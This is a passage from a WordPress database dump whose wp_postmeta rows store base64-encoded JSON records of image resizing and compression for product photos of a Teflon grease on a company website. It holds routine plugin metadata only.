jIsImlkIjoxODExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MDYsInRpbWUiOjE0ODM1NjI1MjUsImlkIjoxODExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MjAsInRpbWUiOjE0ODM1NjI1MjgsImlkIjoxODExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NDIsInRpbWUiOjE0ODM1NjI1MzIsImlkIjoxODExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo4ODcsInRpbWUiOjE0ODM1NjI1MzUsImlkIjoxODExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzkzLCJ0aW1lIjoxNDgzNTYyNTM5LCJpZCI6MTgxMX1d'); 
INSERT INTO `wp_postmeta` VALUES (29144, 1810, 'wpfc_optimisation_reduction', '3203705'); 
INSERT INTO `wp_postmeta` VALUES (29145, 1810, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MuanBnIiwicmVkdWN0aW9uIjozMjAzNDgwLCJ0aW1lIjoxNDgzNTYyNTUxLCJpZCI6IjE4MTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjU1MywiaWQiOjE4MTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNTU3LCJpZCI6MTgxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI1NjAsImlkIjoxODEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNTY4LCJpZCI6MTgxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI1NzAsImlkIjoxODEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjU3MywiaWQiOjE4MTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNTc1LCJpZCI6MTgxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI1NzgsImlkIjoxODEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNTgxLCJpZCI6MTgxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjU4NCwiaWQiOjE4MTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI1ODcsImlkIjoxODEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNTg5LCJpZCI6MTgxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjIxMywidGltZSI6MTQ4MzU2MjU5MiwiaWQiOjE4MTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29146, 1809, 'wpfc_optimisation_reduction', '2969499'); 
INSERT INTO `wp_postmeta` VALUES (29147, 1809, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVIuanBnIiwicmVkdWN0aW9uIjoyOTY5MzI5LCJ0aW1lIjoxNDgzNTYyNjA4LCJpZCI6IjE4MDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjYxMSwiaWQiOjE4MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNjE0LCJpZCI6MTgwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI2MTcsImlkIjoxODA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNjIxLCJpZCI6MTgwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI2MjQsImlkIjoxODA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVh